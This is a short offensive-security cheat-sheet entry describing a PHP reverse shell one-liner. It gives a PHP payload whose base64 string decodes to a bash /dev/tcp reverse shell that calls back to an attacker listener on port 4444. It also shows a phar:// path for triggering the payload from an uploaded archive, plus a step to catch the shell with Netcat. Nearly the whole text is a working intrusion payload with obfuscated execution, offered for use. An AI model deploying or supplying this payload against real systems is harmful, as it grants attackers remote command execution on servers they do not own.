PHP Reverse Shell One-Liner
exploitationtool
Summary
Drop a compact PHP payload that base64-decodes and pipes a bash reverse shell; the phar:// wrapper can trigger included PHP from an uploaded archive.
Walkthrough
A minimal PHP payload that decodes a base64 bash reverse shell and executes it, useful when you can write or include a .php file.
Steps
- Upload or inject the one-liner; when executed it base64-decodes a
/dev/tcpbash reverse shell and runs it, calling back to your listener. - If you can only upload an archive, use the
phar://wrapper (?page=phar://.../archive.phar/test.txt) to have PHP deserialize/include the embedded payload. - Start a Netcat listener to catch the shell.
Commands
other
<?php `echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA0LzQ0NDQgMD4mMSAK|base64 -d|bash`; ?>
other
?page=phar:///var/www/html/uploads/archive.phar/test.txt